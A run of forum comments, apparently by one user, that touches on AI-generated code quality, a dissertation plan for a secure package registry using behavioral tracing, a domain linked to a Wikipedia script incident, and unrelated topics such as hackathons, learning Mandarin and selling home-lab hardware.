What does production ready even mean? The problem with AI is that there isn't an obvious way to prove how much human attention\care was actually put in & thus no signal on quality. Nobody is gonna review 1M lines. Also, the 1M line number shouldn't really be a boast. More lines != higher quality or more features
Fair points. "Production-ready" was probably too strong for v0.1.0 — "API-stable" is more accurate. The crates compile, pass their test suites, and the public API surface is locked, but real production readiness comes from users hitting edge cases we haven't. (no warnings policy etc.)
On line count — you're right that more lines isn't inherently better. I mentioned it as a scale indicator, not a quality claim. The meaningful numbers are the 92 crates, the codec/container/protocol coverage, and the test results.
Happy to discuss any specific module if you want to dig into the details.
I've been working on a project lately as my bachelor's dissertation which I later plan on working on long term on this issue.
The basic premise is a secure package registry as an alternative to NPM/PyPi/etc where we use a bunch of different methods to try to minimize risk. So e.g. reproducible builds, tracing execution and finding behavioral differences between release and source, historical behavioral anomalies, behavioral differences with baseline safe package, etc. And then rather than having to install any client side software, just do a `npm config set registry https://reg.example.com/api/packages/secure/npm/`
eBPF traces of high level behavior like network requests & file accesses should catch the most basic mass supply chain attacks like Shai Hulud. The more difficult one is xz-utils style attacks where it's a subtle backdoor. That requires tests that we can run reproducibly across versions & tracing exact behavior.
Hopefully by automating as much as possible, we can make this generally accessible rather than expensive enterprise-only like most security products (really annoys me). Still definitely need a layer of human reviews for anything it flags though since a false positive might as well be defamation.
Won't know if this is the right direction until things are done & we can benchmark against actual case studies, but at least one startup accelerator is interested in funding.
I registered it about 40 minutes ago, but it seems the DNS has been cached by everyone as a result of the wikipedia hack & not even the NS is propagating. Can't get an SSL certificate .
I had looked into its availability too just out of curiosity itself before reading your comment on a provider, Then I read your comment. Atleast its taken in from the hackernews community and not a malicious actor.
Do keep us updated on the whole situation if any relevant situation can happen from your POV perhaps.
I'd suggest to give the domain to wikipedia team as they might know what could be the best use case of it if possible.
Not quite sure which channels I should reach out via but I've put my email on the page so they can contact me.
Based on timings, it seems that Wikipedia wasn't really at risk from the domain being bought as everything was resolved before NS records could propagate. I got 1 hit from the URL which would've loaded up the script and nothing since.
Its misinformation that the malicious script loaded that domain. The malicious script did have a url with that domain in it, but it wouldnt load javascript from it (possibly due to a programming mistake/misunderstanding by the author, its kind of unclear what the original intent was)
> they are using Apple's Wi-Fi positioning service, but proxying it through their own servers
My concern with this system is that their proxy is (afaik) compatible with Google's format, which by default is less privacy respecting as it does the location calculation server side and doesn't allow the client to cache.
I'd much prefer if they called out to Apple's servers directly (or through a direct proxy) & cached the AP data locally so over time it will work offline.
I say it somewhat jokingly. Most of the challenges were AI, but there was a specific security track that wasn't about AI (but AI bug bounty hunter won. Not too mad, just annoyed at miscommunication about which countries the sponsor was actually in).
> If anything, this is pretty much the opposite of what a hackathon is supposed to be: A place where you meet people you might not even know, come up with an idea on the spot and develop an MVP + pitch it on a tight (time) budget. Taking an idea you've already been working on for months and using it for a hackathon submission feels... odd
The thing I've been working on is a much larger encompassing system where this would just be a small component. No code reused because no code was written for this yet. My task now is to take the shit code written during the hackathon and make it actually usable.
> The first is probably true, but to really judge the impact of it (Did AI generated ideas actually win?) we'd have to see the results
Yes, the winner also won the Lovable and Claude tracks. Lovable track was specifically about vibe-coding.
100% agree even as someone who grew up around people speaking mandarin. I still cannot write despite having taken the language in both GCSEs and IB, while also living in the country for 3+ years.
i can speak the language just enough to get by but once you get into technical terms, i'm once again completely lost. Unless they do a Singapore or Dubai and make business in English, i dont see any chance of them attracting talent
the current spikes tempt me to sell off my home lab. a mac mini to sell to the open claw bros, 5tb HDD, Intel NUC, some SSDs, and a 5 year old dell laptop. can always buy back after the crash.
reply